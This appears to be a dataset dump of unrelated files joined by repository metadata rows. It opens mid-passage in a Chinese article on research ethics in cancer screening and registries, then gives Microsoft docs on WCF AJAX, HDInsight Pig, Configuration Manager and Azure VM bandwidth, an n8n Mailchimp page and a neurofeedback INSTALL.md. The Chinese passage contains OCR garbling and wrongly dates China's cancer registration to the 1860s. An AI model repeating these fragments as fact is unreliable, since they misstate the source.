CICAMS在林县进行的大规模的随机双盲有对照的营养干预试验,参加者为食管癌高发区的农民29,584名。尽管参加试验的农民属于食管癌高发区的人群,但是他们的基线调查通常显示为无症状或无病状态。他们中的大部分人即使 不参加任何干预,也可能不会发展为食管癌。因此健康个体也被随机分配,接受5年的维生素/矿物质或者安慰剂补充。NCI和CICAMS的IRB均批准了这个科学研究计划,并认为它对于参加者的有益之处大于潜在危险性,是可以接受的。双 方的IRB每年都对这项研究中涉及的伦理性问题进行复审。知情同意书中的信息包括了整个研究的过程,试验的危害性,自愿参加准则,科学研究的真实性,保护隐私性和研究对象分组情况的保密性,以及有1/8被选中安慰剂对照的可能性(半数重复42的析因设计)。由于参加者有40%文盲,项目的现场负责人以小组会和壁报的形式给参加者讲解这项研究的意义和利弊(知情),并解答他们提出的所有问题。自愿参加者在知情同意二|;上逐一签名或按手印(同意)。高发区人群一般都愿意参加癌症预防试验,但对安慰剂对照不喜欢。在保证统计功效的基础上,应尽量减少安慰剂对照的样本数量。另外,研究者也提供了对患病个体的部分医疗照顾和误工补偿。
### 肿瘤筛查
癌症筛查研究与其他研究一样,首先要通过伦理委员会的审批。伦理审查的内容包括研究方案、CRF、研究器械或药物的安全性资料、研究中可能出现问题的对策、知情同意书、主要研究者资质等。对于多中心临床研究还需保证伦理审查的一致性和及时性。组长单位需审核方案的科学性与伦理合理性,参加单位需在接受组长单位审查意见的前提下审查研究在本单位的可行性。赫尔辛基宣言第26条提到:“每位潜在的受试者必须被充分告知:研究目的、方法、资金来源、任何可能的利益冲突、研究人员的机构隶属关系、研究预期的获益和潜在的风险、研究可能造成的不适、试验结束后的条款,以及任何其他相关方面的信息”。因此,受试者在被完全告知、充分理解、没有不正当影响的情况下签署《知情同意书》也是研究的重要组成部分。因参与研究受到伤害的受试者应得到适当的补偿和治疗,必要时可为其购买保险。知情同意书的签署保 护的不仅是受试者的权益,也为研究者规避了一定的风险5。
目前对于肿瘤筛查也是争议不断,对于已经推广的筛查工作,较为肯定的只有乳腺癌和宫颈癌的筛查工作。争议主要是对于筛查目的的认识、筛查作用的认识、生存期延长与领先时间的争议、成本与效益的问题、筛查本身对社会公众带来的心理问题、哪些人应该列为筛查对象的伦理问题以及筛查检出病例的治疗是否比临床诊断的、采取相同疗法的病例更有效?6
### 肿瘤监测
我国自19世纪60年代开展肿瘤监测也就是以人群为基础的肿瘤登记,其目的是监测人群癌症负担以及发展趋势,为病因学研究提供原始资料,有效评价癌症防治措施的效果,为制定癌症防控策略提供依据。
以人群为基础的肿瘤登记,与医学科学研究的个案调查需尊重患者知情同意权不同,肿瘤登记是一项经常性地监测人群癌症发生、死亡与生存情况的社会公共卫生工作,旨在促进人类社会的健康发展。同时,肿瘤登记处在数据收集过程所获得登记病例信息是间接的,获得每一位病人的知情同意是不现实的。如要获得全部登记病例的知情同意,则该项工作基本不能实施。如果仅有部分知情同意,登记所获得信息则无法达到肿瘤登记数据的可比性、完整性和有效性的基本要求标准。肿瘤登记资料的获取、保存和利用应遵循赫尔辛基宣言和纽伦堡法典中所提及的医学伦理学的基本原则。而WHO公布的《公共卫生监测伦理指南》第12条也指出“如果可靠、有效、完全的数据集是必须的,且相关的保护措施得当,那么个人有义务为监测做出贡献。在这些情况下,知情同意不一定伦理上必须的”7, 8。但在肿瘤登记实际运行过程中和数据利用及信息发布时,相关的保密原则是应严格执行,要充分尊重患者的隐私权,防止个人信息泄露和数据滥用。国家卫生计生委、国家中医药管理局联合下发的“关于印发肿瘤登记管理办法的通知”国卫疾控发【2015】6号文件第五章保障措施中的第十九条专门对肿瘤资料保密作出规定:“各肿瘤报告单位及有关研究机构在利用肿瘤登记报告信息时,应当遵从国家法律法规和有关规定、伦理学准则、知识产权准则和保密原则,对个案肿瘤病例信息采取管理和技术上的安全措施,保护患者隐私和信息安全。”
## 参考文献
1. SOSKOLNE CL. EPIDEMIOLOGY: QUESTIONS OF SCIENCE, ETHICS, MORALITY, AND LAW. American Journal of Epidemiology 1989;129:1-18.
2. 涉及人的生物医学研究伦理审查办法 中华人民共和国中央人民政府, 2016.
3. 孟若谷, 翟炎冰, 陈森, 张晏畅, 张越伦, 赵剑云, 孙凤. 《中华流行病学杂志》和 American Journal of Epidemiology 的医学伦理问题比较. 中华流行病学杂志 2012;33:106-10.
4. 乔友林. 在中国开展肿瘤流行病学研究的伦理学问题. 北京国际生命伦理学学术会议 2004.
5. 陈世耀, 杜玄凌, 韦怡超. 开展早癌筛查研究面临的问题. 中国癌症防治杂志 2017;9:90-93.
6. 杨秉辉. 关于肿瘤筛查的争议与思考. 医学与哲学 2017;38:2-4.
7. 张海洪, 丛亚丽. 世界卫生组织《公共卫生监测伦理指南》要点及启示. 医学与哲学 2018;39:26-28,36.
8. 巴璐, 蔡慧媛, 戎或. 公共卫生监测中的伦理问题及其借鉴意义. 医学与哲学 2019;40:33-39.
| 93.777778 | 599 | 0.87891 | yue_Hant | 0.855696 |
e056dbd56b1ba341ab4b2f4addbf25739520e447 | 3,800 | md | Markdown | docs/framework/wcf/samples/basic-ajax-service.md | cy-org/docs-conceptual.zh-cn | 0c18cda3dd707efdcdd0e73bc480ab9fbbc4580c | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wcf/samples/basic-ajax-service.md | cy-org/docs-conceptual.zh-cn | 0c18cda3dd707efdcdd0e73bc480ab9fbbc4580c | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wcf/samples/basic-ajax-service.md | cy-org/docs-conceptual.zh-cn | 0c18cda3dd707efdcdd0e73bc480ab9fbbc4580c | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "基本 AJAX 服务 | Microsoft Docs"
ms.custom: ""
ms.date: "03/30/2017"
ms.prod: ".net-framework-4.6"
ms.reviewer: ""
ms.suite: ""
ms.technology:
- "dotnet-clr"
ms.tgt_pltfrm: ""
ms.topic: "article"
ms.assetid: d66d0c91-0109-45a0-a901-f3e4667c2465
caps.latest.revision: 30
author: "Erikre"
ms.author: "erikre"
manager: "erikre"
caps.handback.revision: 30
---
# 基本 AJAX 服务
本示例演示如何使用 [!INCLUDE[indigo1](../../../../includes/indigo1-md.md)] 创建基本的 ASP.NET 异步 JavaScript 和 XML \(AJAX\) 服务(通过从 Web 浏览器客户端使用 JavaScript 代码可以访问的服务)。 该服务使用 <xref:System.ServiceModel.Web.WebGetAttribute> 属性以确保服务响应 HTTP GET 请求并被配置为对响应使用 JavaScript 对象表示法 \(JSON\) 数据格式。
[!INCLUDE[indigo2](../../../../includes/indigo2-md.md)] 对 AJAX 的支持经过了优化,以便通过 `ScriptManager` 控件与 ASP.NET AJAX 一起使用。 有关将 ASP.NET AJAX 与 [!INCLUDE[indigo2](../../../../includes/indigo2-md.md)] 一起使用的示例,请参见 [AJAX Samples](http://msdn.microsoft.com/zh-cn/f3fa45b3-44d5-4926-8cc4-a13c30a3bf3e)。
> [!NOTE]
> 本主题的最后介绍了此示例的设置过程和生成说明。
在下面的代码中,将 <xref:System.ServiceModel.Web.WebGetAttribute> 属性应用于 `Add` 操作以确保服务响应 HTTP GET 请求。 为了简单起见,该代码使用 GET(您可以从任何 Web 浏览器构造 HTTP GET 请求)。 也可以使用 GET 来启用缓存。 在缺少 `WebGetAttribute` 属性时,HTTP POST 是默认属性。
```
[ServiceContract(Namespace = "SimpleAjaxService")]
public interface ICalculator
{
[WebGet]
double Add(double n1, double n2);
//Other operations omitted…
}
```
示例 .svc 文件使用的是 <xref:System.ServiceModel.Activation.WebScriptServiceHostFactory>,后者会将 <xref:System.ServiceModel.Description.WebScriptEndpoint> 标准终结点添加到服务。 可在相对于 .svc 文件的空地址处配置该终结点。 这意味着服务的地址是 http:\/\/localhost\/ServiceModelSamples\/service.svc,除了操作名以外没有其他后缀。
```
<%@ServiceHost language="C#" Debug="true" Service="Microsoft.Samples.SimpleAjaxService.CalculatorService" Factory="System.ServiceModel.Activation.WebScriptServiceHostFactory" %>
```
将对 <xref:System.ServiceModel.Description.WebScriptEndpoint> 进行预配置,以便能从 ASP.NET AJAX 客户端页访问服务。 可以使用 Web.config 中的以下节对终结点进行其他配置更改。 如果不需要额外更改,则可以移除该节。
```xml
<system.serviceModel>
<standardEndpoints>
<webScriptEndpoint>
<!-- Use this element to configure the endpoint -->
<standardEndpoint name="" />
</webScriptEndpoint>
</standardEndpoints>
</system.serviceModel>
```
<xref:System.ServiceModel.Description.WebScriptEndpoint> 将服务的默认数据格式设置为 JSON 而不是 XML。 若要调用服务,请在完成本主题后面的设置和生成步骤 后定位到 http:\/\/localhost\/ServiceModelSamples\/service.svc\/Add?n1\=100&n2\=200。 这个测试功能是通过使用 HTTP GET 请求实现的。
客户端 Web 页 SimpleAjaxClientPage.aspx 包含 ASP.NET 代码,无论何时用户单击该页面上的操作按钮之一,就能调用服务。 `ScriptManager` 控件用于使服务的代理可以通过 JavaScript 访问。
```
<asp:ScriptManager ID="ScriptManager" runat="server">
<Services>
<asp:ServiceReference Path="service.svc" />
</Services>
</asp:ScriptManager>
```
使用以下 JavaScript 代码实例化本地代理和调用操作。
```
// Code for extracting arguments n1 and n2 omitted…
// Instantiate a service proxy
var proxy = new SimpleAjaxService.ICalculator();
// Code for selecting operation omitted…
proxy.Add(parseFloat(n1), parseFloat(n2), onSuccess, onFail, null);
```
如果服务调用成功,则代码调用 `onSuccess` 处理程序并在文本框中显示操作结果。
```
function onSuccess(mathResult){
document.getElementById("result").value = mathResult;
}
```
> [!IMPORTANT]
> 您的计算机上可能已安装这些示例。 在继续操作之前,请先检查以下(默认)目录:
>
> `<安装驱动器>:\WF_WCF_Samples`
>
> 如果此目录不存在,请访问[针对 .NET Framework 4 的 Windows Communication Foundation \(WCF\) 和 Windows Workflow Foundation \(WF\) 示例](http://go.microsoft.com/fwlink/?LinkId=150780)(可能为英文网页),下载所有 [!INCLUDE[indigo1](../../../../includes/indigo1-md.md)] 和 [!INCLUDE[wf1](../../../../includes/wf1-md.md)] 示例。 此示例位于以下目录:
>
> `<安装驱动器>:\WF_WCF_Samples\WCF\Basic\Ajax\SimpleAjaxService`
## 请参阅 | 36.893204 | 304 | 0.7 | yue_Hant | 0.924976 |
e05747b1bd1947ac37d98023fcb894a146206a7e | 6,110 | md | Markdown | articles/hdinsight/hdinsight-hadoop-use-pig-remote-desktop.md | portizencamina/azure-docs | fe0e49f0c1f6b577ad53a7f57de5a54f5487a90b | [
"CC-BY-4.0",
"MIT"
] | 1 | 2022-03-22T15:03:27.000Z | 2022-03-22T15:03:27.000Z | articles/hdinsight/hdinsight-hadoop-use-pig-remote-desktop.md | portizencamina/azure-docs | fe0e49f0c1f6b577ad53a7f57de5a54f5487a90b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/hdinsight/hdinsight-hadoop-use-pig-remote-desktop.md | portizencamina/azure-docs | fe0e49f0c1f6b577ad53a7f57de5a54f5487a90b | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-05-14T19:38:19.000Z | 2020-05-14T19:38:19.000Z | ---
title: Use Hadoop Pig with Remote Desktop in HDInsight | Microsoft Docs
description: Learn how to use the Pig command to run Pig Latin statements from a Remote Desktop connection to a Windows-based Hadoop cluster in HDInsight.
services: hdinsight
documentationcenter: ''
author: Blackmist
manager: jhubbard
editor: cgronlun
tags: azure-portal
ms.assetid: e034a286-de0f-465f-8bf1-3d085ca6abed
ms.service: hdinsight
ms.devlang: na
ms.topic: article
ms.tgt_pltfrm: na
ms.workload: big-data
ms.date: 01/17/2017
ms.author: larryfr
ROBOTS: NOINDEX
---
# Run Pig jobs from a Remote Desktop connection
[!INCLUDE [pig-selector](../../includes/hdinsight-selector-use-pig.md)]
This document provides a walkthrough for using the Pig command to run Pig Latin statements from a Remote Desktop connection to a Windows-based HDInsight cluster. Pig Latin allows you to create MapReduce applications by describing data transformations, rather than map and reduce functions.
> [!IMPORTANT]
> Remote Desktop is only available on HDInsight clusters that use Windows as the operating system. Linux is the only operating system used on HDInsight version 3.4 or greater. For more information, see [HDInsight Deprecation on Windows](hdinsight-component-versioning.md#hdi-version-33-nearing-deprecation-date).
>
> For HDInsight 3.4 or greater, see [Use Pig with HDInsight and SSH](hdinsight-hadoop-use-pig-ssh.md) for information on interactively running Pig jobs directly on the cluster from a command-line.
## <a id="prereq"></a>Prerequisites
To complete the steps in this article, you will need the following.
* A Windows-based HDInsight (Hadoop on HDInsight) cluster
* A client computer running Windows 10, Windows 8, or Windows 7
## <a id="connect"></a>Connect with Remote Desktop
Enable Remote Desktop for the HDInsight cluster, then connect to it by following the instructions at [Connect to HDInsight clusters using RDP](hdinsight-administer-use-management-portal.md#connect-to-clusters-using-rdp).
## <a id="pig"></a>Use the Pig command
1. After you have a Remote Desktop connection, start the **Hadoop Command Line** by using the icon on the desktop.
2. Use the following to start the Pig command:
%pig_home%\bin\pig
You will be presented with a `grunt>` prompt.
3. Enter the following statement:
LOGS = LOAD 'wasbs:///example/data/sample.log';
This command loads the contents of the sample.log file into the LOGS file. You can view the contents of the file by using the following command:
DUMP LOGS;
4. Transform the data by applying a regular expression to extract only the logging level from each record:
LEVELS = foreach LOGS generate REGEX_EXTRACT($0, '(TRACE|DEBUG|INFO|WARN|ERROR|FATAL)', 1) as LOGLEVEL;
You can use **DUMP** to view the data after the transformation. In this case, `DUMP LEVELS;`.
5. Continue applying transformations by using the following statements. Use `DUMP` to view the result of the transformation after each step.
<table>
<tr>
<th>Statement</th><th>What it does</th>
</tr>
<tr>
<td>FILTEREDLEVELS = FILTER LEVELS by LOGLEVEL is not null;</td><td>Removes rows that contain a null value for the log level and stores the results into FILTEREDLEVELS.</td>
</tr>
<tr>
<td>GROUPEDLEVELS = GROUP FILTEREDLEVELS by LOGLEVEL;</td><td>Groups the rows by log level and stores the results into GROUPEDLEVELS.</td>
</tr>
<tr>
<td>FREQUENCIES = foreach GROUPEDLEVELS generate group as LOGLEVEL, COUNT(FILTEREDLEVELS.LOGLEVEL) as COUNT;</td><td>Creates a new set of data that contains each unique log level value and how many times it occurs. This is stored into FREQUENCIES</td>
</tr>
<tr>
<td>RESULT = order FREQUENCIES by COUNT desc;</td><td>Orders the log levels by count (descending,) and stores into RESULT</td>
</tr>
</table>
6. You can also save the results of a transformation by using the `STORE` statement. For example, the following command saves the `RESULT` to the **/example/data/pigout** directory in the default storage container for your cluster:
STORE RESULT into 'wasbs:///example/data/pigout'
> [!NOTE]
> The data is stored in the specified directory in files named **part-nnnnn**. If the directory already exists, you will receive an error message.
>
>
7. To exit the grunt prompt, enter the following statement.
QUIT;
### Pig Latin batch files
You can also use the Pig command to run Pig Latin that is contained in a file.
1. After exiting the grunt prompt, open **Notepad** and create a new file named **pigbatch.pig** in the **%PIG_HOME%** directory.
2. Type or paste the following lines into the **pigbatch.pig** file, and then save it:
LOGS = LOAD 'wasbs:///example/data/sample.log';
LEVELS = foreach LOGS generate REGEX_EXTRACT($0, '(TRACE|DEBUG|INFO|WARN|ERROR|FATAL)', 1) as LOGLEVEL;
FILTEREDLEVELS = FILTER LEVELS by LOGLEVEL is not null;
GROUPEDLEVELS = GROUP FILTEREDLEVELS by LOGLEVEL;
FREQUENCIES = foreach GROUPEDLEVELS generate group as LOGLEVEL, COUNT(FILTEREDLEVELS.LOGLEVEL) as COUNT;
RESULT = order FREQUENCIES by COUNT desc;
DUMP RESULT;
3. Use the following to run the **pigbatch.pig** file using the pig command.
pig %PIG_HOME%\pigbatch.pig
When the batch job completes, you should see the following output, which should be the same as when you used `DUMP RESULT;` in the previous steps:
(TRACE,816)
(DEBUG,434)
(INFO,96)
(WARN,11)
(ERROR,6)
(FATAL,2)
## <a id="summary"></a>Summary
As you can see, the Pig command allows you to interactively run MapReduce operations, or run Pig Latin jobs that are stored in a batch file.
## <a id="nextsteps"></a>Next steps
For general information about Pig in HDInsight:
* [Use Pig with Hadoop on HDInsight](hdinsight-use-pig.md)
For information about other ways you can work with Hadoop on HDInsight:
* [Use Hive with Hadoop on HDInsight](hdinsight-use-hive.md)
* [Use MapReduce with Hadoop on HDInsight](hdinsight-use-mapreduce.md)
| 47.364341 | 312 | 0.734861 | eng_Latn | 0.981311 |
e057a3dc9bb2ce51fab28f90c2746adf0332c404 | 2,366 | md | Markdown | memdocs/configmgr/core/get-started/2019/includes/1901/3699367.md | Mr-Tbone/memdocs.sv-se | e369d5c63d1706200c13c9606c9d7d4f536f0395 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | memdocs/configmgr/core/get-started/2019/includes/1901/3699367.md | Mr-Tbone/memdocs.sv-se | e369d5c63d1706200c13c9606c9d7d4f536f0395 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | memdocs/configmgr/core/get-started/2019/includes/1901/3699367.md | Mr-Tbone/memdocs.sv-se | e369d5c63d1706200c13c9606c9d7d4f536f0395 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
author: aczechowski
ms.author: aaroncz
ms.prod: configuration-manager
ms.topic: include
ms.date: 01/22/2019
ms.openlocfilehash: ce1303c5b8e3d279d1f2c9746939329319999498
ms.sourcegitcommit: bbf820c35414bf2cba356f30fe047c1a34c5384d
ms.translationtype: MT
ms.contentlocale: sv-SE
ms.lasthandoff: 04/21/2020
ms.locfileid: "81717148"
---
## <a name="view-recently-connected-consoles"></a><a name="bkmk_console"></a>Visa nyligen anslutna konsoler
<!--3699367-->
Baserat på din [feedback från UserVoice](https://configurationmanager.uservoice.com/forums/300492-ideas/suggestions/12508299-active-admin-consoles)kan du nu visa de senaste anslutningarna för Configuration Manager-konsolen. Vyn innehåller aktiva anslutningar och de som nyligen var anslutna.
### <a name="prerequisites"></a>Förutsättningar
- Ditt konto måste ha **Läs** behörighet för **SMS_SITE** -objektet
- Aktivera SMS-providern för att använda ett certifikat.<!--SCCMDocs-pr issue 3135--> Välj ett av följande alternativ:
- Aktivera [utökad http](../../../../plan-design/hierarchy/enhanced-http.md) (rekommenderas)
- Bind ett PKI-baserat certifikat manuellt till port 443 i IIS på den server som är värd för SMS-providerns roll
### <a name="try-it-out"></a>prova!
Försök att slutföra uppgifterna. Skicka sedan [feedback](../../../../understand/find-help.md#product-feedback) med dina tankar om funktionen.
1. Gå till arbets ytan **Administration** i Configuration Manager-konsolen.
2. Expandera **säkerhet** och välj noden **konsol anslutningar** .
3. Visa de senaste anslutningarna med följande egenskaper:
- Användarnamn
- Dator namn
- Ansluten platskod
- Konsol version
- Senast ansluten: när användaren senast *öppnade* konsolen
Du ser alltid din aktuella konsol anslutning i listan. Den visar bara anslutningar från Configuration Manager-konsolen, inte PowerShell eller andra SDK-baserade anslutningar till SMS-providern. Platsen tar bort instanser från listan som är äldre än 30 dagar.
### <a name="known-issue"></a>Kända problem
När du visar den här noden kan Configuration Manager-konsolen sluta fungera korrekt.
#### <a name="workaround"></a>Lösning
I egenskaperna för plats rollen SMS-provider inaktiverar du alternativet för att **tillåta Configuration Manager Cloud Management Gateway-trafik för administrations tjänsten**.
| 41.508772 | 292 | 0.764582 | swe_Latn | 0.989545 |
e0580fcbcd4d1659c6f09926b0a663a1a68bacae | 3,328 | md | Markdown | articles/virtual-network/virtual-machine-network-throughput.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/virtual-network/virtual-machine-network-throughput.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/virtual-network/virtual-machine-network-throughput.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Azure 虚拟机网络吞吐量 | Microsoft Docs
description: 了解 Azure 虚拟机网络吞吐量。
services: virtual-network
documentationcenter: na
author: steveesp
editor: ''
tags: azure-resource-manager
ms.assetid: ''
ms.service: virtual-network
ms.devlang: na
ms.topic: article
ms.tgt_pltfrm: na
ms.workload: infrastructure-services
ms.date: 4/26/2019
ms.author: kumud,steveesp, mareat
ms.openlocfilehash: 9d74e53c754367ecfa63642514db93354fcadf25
ms.sourcegitcommit: f6ba5c5a4b1ec4e35c41a4e799fb669ad5099522
ms.translationtype: MT
ms.contentlocale: zh-CN
ms.lasthandoff: 05/06/2019
ms.locfileid: "65153728"
---
# <a name="virtual-machine-network-bandwidth"></a>虚拟机网络带宽
Azure 提供各种 VM 大小和类型,每一种包含的性能各不相同。 其中一种是网络吞吐量(也称带宽),以兆位/秒 (Mbps) 表示。 由于虚拟机托管在共享硬件上,因此网络容量必须在共享同一硬件的虚拟机中公平地共享。 在分配时,较大的虚拟机相对于较小的虚拟机会获得相对较多的带宽。
分配给每个虚拟机的网络带宽按虚拟机的传出(出站)流量计算。 从虚拟机流出的所有网络流量均计入分配限制,不管流向哪个目标。 例如,如果虚拟机的限制为 1,000 Mbps,则不管出站流量的目标是同一虚拟网络中的另一虚拟机,还是 Azure 外部,均适用该限制。
传入流量不直接计算,或者说不直接受到限制。 但是,其他因素(例如 CPU 和存储限制)可能会影响虚拟机处理传入数据的能力。
加速网络是一项旨在改进网络性能(包括延迟、吞吐量和 CPU 使用率)的功能。 虽然加速网络可以改进虚拟机的吞吐量,但仍受分配给该虚拟机的带宽的限制。 若要详细了解如何使用加速网络,请查看适用于 [Windows](create-vm-accelerated-networking-powershell.md) 或 [Linux](create-vm-accelerated-networking-cli.md) 虚拟机的加速网络。
Azure 虚拟机必须有一个(但也可能有多个)连接的网络接口。 分配给某个虚拟机的带宽是流经所有网络接口(已连接到该虚拟机)的所有出站流量的总和。 换言之,分配的带宽是针对每个虚拟机的,不管为该虚拟机连接了多少网络接口。 若要了解不同的 Azure VM 大小支持的网络接口数,请查看 Azure [Windows](../virtual-machines/windows/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) 和 [Linux](../virtual-machines/linux/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) VM 大小。
## <a name="expected-network-throughput"></a>预期的网络吞吐量
若要详细了解每种 VM 大小支持的预期出站吞吐量和网络接口数,请查看 Azure [Windows](../virtual-machines/windows/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) 和 [Linux](../virtual-machines/linux/sizes.md?toc=%2fazure%2fvirtual-network%2ftoc.json) VM 大小。 选择一个类型(例如“通用”),然后在生成的页面上选择一个大小系列(例如“Dv2 系列”)。 每个系统都有一个表,在最后一列(名为“最大 NIC 数/预期网络性能(Mbps)”)中包含网络规格。
吞吐量限制适用于虚拟机。 吞吐量不受以下因素影响:
- **网络接口数**:带宽限制都是累积的所有出站流量从虚拟机。
- **加速网络**:尽管该功能可以有助于流量达到已发布的限制,它不会更改此限制。
- **流量目标**:所有目标都计入出站限制。
- **协议**:所有协议的所有出站流量将计入此限制。
## <a name="network-flow-limits"></a>网络流限制
除了带宽,在任何给定时间在 VM 上存在网络连接数可能会影响其网络性能。 Azure 网络堆栈维护每个方向的名为流的数据结构中的 TCP/UDP 连接的状态。 典型的 TCP/UDP 连接将有 2 个流创建,另一个用于入站和出站方向的另一个。
终结点之间的数据传输,需要创建多个流,除了执行数据传输。 一些示例为创建的 DNS 解析的流和创建负载均衡器运行状况探测的流。 此外请注意,网络如网关、 代理、 防火墙和虚拟设备 (Nva) 将看到正在终止在设备和由设备发起的连接创建的流。

## <a name="flow-limits-and-recommendations"></a>流限制和建议
目前,Azure 网络堆栈支持具有良好的性能 250k 个总网络流的 Vm 使用大于 8 个 CPU 内核和良好性能的 Vm 使用少于 8 个 CPU 内核的 100 k 总流。 超过此限制网络性能下降正常的最大为 1 M 硬限制的其他流的总流,50 万个入站和 500 K 出站、 后的其他流将被删除。
||使用 Vm < 8 个 CPU 内核|具有 8 个 CPU 内核的 Vm|
|---|---|---|
|<b>良好的性能</b>|10 万个流 |250k 个流|
|<b>性能下降</b>|上面 100k 为单位的流|上面 250k 流|
|<b>流限制</b>|1 百万的流|1 百万的流|
度量值位于[Azure Monitor](../azure-monitor/platform/metrics-supported.md#microsoftcomputevirtualmachines)用于跟踪 VM 或 VMSS 实例上的网络流和流创建速率。

连接建立和终止速率也会影响网络性能作为连接建立和终止共享 CPU 与数据包处理例程。 我们建议,都设为基准根据预期的流量模式和横向扩展工作负荷的工作负荷适当地以满足性能需求。
## <a name="next-steps"></a>后续步骤
- [优化虚拟机操作系统的网络吞吐量](virtual-network-optimize-network-bandwidth.md)
- 针对虚拟机[测试网络吞吐量](virtual-network-bandwidth-testing.md)。
| 44.972973 | 334 | 0.788762 | yue_Hant | 0.532645 |
e0586e91b74f85064d643e65a92531e66b16bd0b | 1,469 | md | Markdown | docs/nodes/nodes-library/nodes/Mailchimp/README.md | StrangeBeeCorp/n8n-docs | 934832c74f55b5b85db2d8aae91246d237b6c99c | [
"Apache-2.0"
] | null | null | null | docs/nodes/nodes-library/nodes/Mailchimp/README.md | StrangeBeeCorp/n8n-docs | 934832c74f55b5b85db2d8aae91246d237b6c99c | [
"Apache-2.0"
] | 15 | 2020-06-15T20:38:14.000Z | 2020-07-20T19:14:19.000Z | docs/nodes/nodes-library/nodes/Mailchimp/README.md | MLH-Fellowship/n8n-docs | 9277f16e8f077cc8686ad37b93b917a084c221b2 | [
"Apache-2.0"
] | null | null | null | ---
permalink: /nodes/n8n-nodes-base.mailchimp
---
# Mailchimp
[Mailchimp](https://mailchimp.com/) is an integrated marketing platform that allows business owners to automate their email campaigns and track user engagement.
::: tip 🔑 Credentials
You can find authentication information for this node [here](../../../credentials/Mailchimp/README.md).
:::
## Basic Operations
- Member
- Add a new member on list
- Delete a member on list
- Get a member on list
- Get all members on list
- Update a new member on list
- Member Tag
- Add tags from a list member
- Remove tags from a list member
## Example Usage
This workflow allows you to add a new member to a list in Mailchimp. You can also find the [workflow](https://n8n.io/workflows/413) on this website. This example usage workflow uses the following two nodes.
- [Start](../../core-nodes/Start)
- [Mailchimp]()
The final workflow should look like the following image.

### 1. Start node
The start node exists by default when you create a new workflow.
### 2. Mailchimp node
1. First of all, you'll have to enter credentials for the Mailchimp node. You can find out how to do that [here](../../../credentials/Mailchimp/README.md).
4. Select the Mailchimp list from the *List* dropdown list.
5. Enter the email address in the *Email* field.
6. Select the status from the *Status* dropdown list.
8. Click on *Execute Node* to run the workflow.
| 31.255319 | 206 | 0.732471 | eng_Latn | 0.99023 |
e058770e2004a8240cd37137b16e97bbece6f42e | 5,765 | md | Markdown | INSTALL.md | OOGUN8160/Ola | 88b473552a9870f498f7c1b0e31fb8b3db538a21 | [
"MIT"
] | null | null | null | INSTALL.md | OOGUN8160/Ola | 88b473552a9870f498f7c1b0e31fb8b3db538a21 | [
"MIT"
] | null | null | null | INSTALL.md | OOGUN8160/Ola | 88b473552a9870f498f7c1b0e31fb8b3db538a21 | [
"MIT"
] | null | null | null | # Install
- On a Windows computer
- Install Matlab. You may use a student version of Matlab.
- Install BCILAB https://github.com/sccn/BCILAB and add to Matlab path (go to the root folder and type "bcilab")
- Install the Psychophysics toolbox http://psychtoolbox.org/download/ (select download ZIP file) (go to the root folder and type "PsychDefaultSetup(2)")
- Install the Lab Streaming Layer https://github.com/sccn/labstreaminglayer binaries. **Do not clone the project or download the zip for the Github project**. Instead use the binary repository (ftp://sccn.ucsd.edu/pub/software/LSL/). Download ZIP files for the *labrecorder* (App folder), the program that can interface your EEG system (App folder - for example *Biosemix.xx.zip* if you have a BIOSEMI system) and all the LSL librairies (SDK folder *liblsl-ALL-languages-x.xx.zip*). Familiarize yourself with LSL. You need to be able to connect to your EEG hardware and use the LabRecorder to save data from your hardware, then open and inspect that data under the EEGLAB software (for example). When ready, add the path to Matlab driver to your Matlab path (*liblsl-All-Languages-x.xx/liblsl-Matlab* folder).
# Computer settings
- Set up your screen resolution and screen settings. This program is made to be run on 2 screens, one screen for the subject and one screen for the expertimenter. For technical reasons, it is always better to set your primary screen as the screen for the subject (otherwise the psychophysics toolbox might not work properly).
- Disable visual buffering in Matlab. Create an icon on the desktop for Matlab. Look at properties - compatibility tab. Disable "Desktop composition" and "Disable display scaling on high DPI setttings".
- Go to your graphic card properties (display settings and select your graphic card). If you do not have graphic properties, then do not worry about this step. Disable tripple buferring, double buffering and any other fancy option (3-D etc...).
# Program settings
Program settings are contained in the file [nfblab_options.m](src/nfblab_options.m). Parameters are explained below.
## General parameters
- psychoToolbox (true/false), Toggle to false for testing without psych toolbox
- adrBoard (true/false), Toggle to true if using ADR101 board to send events to the EEG amplifier
## LSL connection parameters
- lsltype (string), put to empty if you cannot connect to your system
- lslname (string), this is the name of the stream that shows in Lab Recorder f empty, it will only use the type above. USE lsl_resolve_byprop(lib, 'type', lsltype, 'name', lslname) to connect to the stream. If you cannot connect nfblab won't be able to connect either.
## sessions parameters
- baselineSessionDuration (integer), duration of baseline in second (the baseline is used to train the artifact removal ASR function)
- sessionDuration (integer), regular sessions - here 5 minutes
- ntrials (integer), number of trials per day
- ndays (integer), number of days of training
## data acquisition parameters
- nchans (integer), number of channels with data
- chans (integer), indices of channels with data
- mask (floating point array), patial filter for feedback (here used channel 1). May be an ICA component or complex spatial filter.
## data processing parameters
- srateHardware (integer), sampling rate of the hardware
- srate (integer), sampling rate for processing data (must divide srateHardware)
- windowSize (integer), length of window size for FFT (if equal to srate then 1 second)
- nfft (integer), length of FFT - allows FFT padding if necessary
- windowInc (integer), window increment - in this case update every 1/4 second
## feedback parameters
- theta [min max]. Frequency range of interest. This program does not allow inhibition at other frequencies although it could be modified to do so
- maxChange (value from 0 to 1). Cap for change in feedback between processed windows every 1/4 sec. feedback is between 0 and 1 so this is 5% here
- dynRange [min max]. Initial power range in dB
- dynRangeInc (value from 0 to 1). Increase in dynamical range in percent if the power value is outside the range (every 1/4 sec)
